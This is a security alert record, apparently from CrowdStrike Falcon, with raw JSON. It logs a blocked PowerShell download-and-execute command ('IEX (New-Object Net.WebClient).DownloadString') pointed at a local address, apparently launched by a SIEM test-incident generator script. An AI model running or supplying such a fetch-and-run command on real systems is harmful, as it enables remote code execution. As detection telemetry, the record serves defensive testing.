High
Process Information
- File Name
cmd.exe- File Path
\Device\HarddiskVolume3\Windows\System32\cmd.exe- Command Line
-
C:\windows\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" - Process ID
26992046078- Parent PID
26930287020- SHA256
-
64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4VT - MD5
6d109a3a00f210c1ab89c3b08399ed48- Disposition
-
2048
Prevention, process was blocked from execution.
Raw JSON Data
{
"metadata": {
"customerIDString": "84393bf974fd44bda943a25a6a7bc27f",
"offset": 157986,
"eventType": "EppDetectionSummaryEvent",
"eventCreationTime": 1766358143000,
"version": "1.0"
},
"event": {
"ProcessStartTime": 1766358082,
"ProcessEndTime": 0,
"ProcessId": 26992046078,
"ParentProcessId": 26930287020,
"Hostname": "BOOK-R0BE6S1NC3",
"UserName": "ubuntu",
"Name": "Attacker Methodology",
"Description": "A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.",
"Severity": 70,
"SeverityName": "High",
"FileName": "cmd.exe",
"FilePath": "\\Device\\HarddiskVolume3\\Windows\\System32\\cmd.exe",
"CommandLine": "C:\\windows\\system32\\cmd.exe /c \u0022powershell -c \u0022IEX (New-Object Net.WebClient).DownloadString(\u0027http://127.0.0.1/ps\u0027)\u0022\u0022",
"SHA256String": "64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4",
"MD5String": "6d109a3a00f210c1ab89c3b08399ed48",
"SHA1String": "0000000000000000000000000000000000000000",
"LogonDomain": "BOOK-R0BE6S1NC3",
"FalconHostLink": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/84393bf974fd44bda943a25a6a7bc27f:ind:024efd237c2d4f87958607652cb04c8b:26992046078-10166-3706640?_cid=g04000x7oomvbbtvcerklzeap3llo7ue",
"AgentId": "024efd237c2d4f87958607652cb04c8b",
"IOCType": "hash_sha256",
"IOCValue": "64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4",
"CompositeId": "84393bf974fd44bda943a25a6a7bc27f:ind:024efd237c2d4f87958607652cb04c8b:26992046078-10166-3706640",
"LocalIP": "172.27.1.19",
"MACAddress": "00-72-ee-3e-51-84",
"Tactic": "Execution",
"Technique": "PowerShell",
"Objective": "Follow Through",
"PatternDispositionDescription": "Prevention, process was blocked from execution.",
"PatternDispositionValue": 2048,
"PatternDispositionFlags": {
"Indicator": false,
"Detect": false,
"InddetMask": false,
"SensorOnly": false,
"Rooting": false,
"KillProcess": false,
"KillSubProcess": false,
"QuarantineMachine": false,
"QuarantineFile": false,
"PolicyDisabled": false,
"KillParent": false,
"OperationBlocked": false,
"ProcessBlocked": true,
"RegistryOperationBlocked": false,
"CriticalProcessDisabled": false,
"BootupSafeguardEnabled": false,
"FsOperationBlocked": false,
"HandleOperationDowngraded": false,
"KillActionFailed": false,
"BlockingUnsupportedOrDisabled": false,
"SuspendProcess": false,
"SuspendParent": false,
"ContainmentFileSystem": false
},
"ParentImageFileName": "python.exe",
"ParentCommandLine": "\u0022C:\\app\\cortex-xdr-siem-test\\.venv\\Scripts\\python.exe\u0022 mega_incident_generator.py --rounds 2 --interval 30 ",
"GrandParentImageFileName": "python.exe",
"GrandParentCommandLine": "\u0022C:\\app\\cortex-xdr-siem-test\\.venv\\Scripts\\python.exe\u0022 mega_incident_generator.py --rounds 2 --interval 30 ",
"HostGroups": "4f5aa5f1cdc6441982cf5c58e4b5d75a",
"AssociatedFile": "\\Device\\HarddiskVolume3\\Windows\\System32\\cmd.exe",
"PatternId": 10166,
"SourceVendors": "CrowdStrike",
"SourceProducts": "Falcon Insight",
"DataDomains": "Endpoint",
"AggregateId": "aggind:024efd237c2d4f87958607652cb04c8b:17576755488",
"Type": "ldt",
"ParentImageFilePath": "\\Device\\HarddiskVolume3\\Users\\ubuntu\\scoop\\apps\\python\\3.13.2\\python.exe",
"GrandParentImageFilePath": "\\Device\\HarddiskVolume3\\app\\cortex-xdr-siem-test\\.venv\\Scripts\\python.exe",
"LocalIPv6": "",
"PlatformId": "0",
"PlatformName": "Windows",
"MitreAttack": [
{
"Tactic": "Execution",
"TacticID": "TA0002",
"Technique": "PowerShell",
"TechniqueID": "T1059.001",
"PatternID": 10166
}
],
"CloudIndicator": false,
"RiskScore": 47
}
}